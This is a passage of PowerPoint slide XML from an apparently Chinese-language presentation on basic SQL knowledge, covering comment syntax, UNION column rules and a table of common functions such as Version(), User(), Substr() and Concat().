              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/* */</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（必须要闭合）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="文本框 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5500372-0CD8-491A-BC5A-63A8461328EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1839949" y="2088162"/>
            <a:ext cx="1415772" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>单行注释</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="文本框 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{080F7C53-C2E5-464F-913A-58D31B26281F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1873655" y="3694440"/>
            <a:ext cx="1415772" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>多行注释</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4086696797"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428990" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="701566"/>
            <a:ext cx="3447063" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33A93AA-ABC9-4F7D-964B-2A5FAFCF92C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378984" y="1327524"/>
            <a:ext cx="1415772" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>常用函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="表格 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05EA80A1-6652-4A3A-BC65-E1BBB7C20CB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3214050606"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2062066" y="1728163"/>
          <a:ext cx="8818786" cy="4404967"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3556219">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2331452171"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5262567">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1345427955"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="432046">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                        <a:t>函数</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                        <a:t>功能</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2780123550"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="432046">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
                        <a:t>Version()</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>返回数据库的版本</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1966933070"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="432046">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
                        <a:t>User()</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>当前登陆用户名</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3834051288"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="432046">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
                        <a:t>Length(char)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                        <a:t>返回字符</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
                        <a:t>char</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                        <a:t>的长度</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3097034025"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="432046">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Substr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>char,index,len</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>截取</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>char</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>，从</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>index</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>开始，截取长度为</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>len</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4075607301"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="516553">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
                        <a:t>Ascii(char)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>返回字符</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>char</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ASCII</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>码值</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="240099939"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="432046">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Concat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100845" marR="100845" marT="50422" marB="50422"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
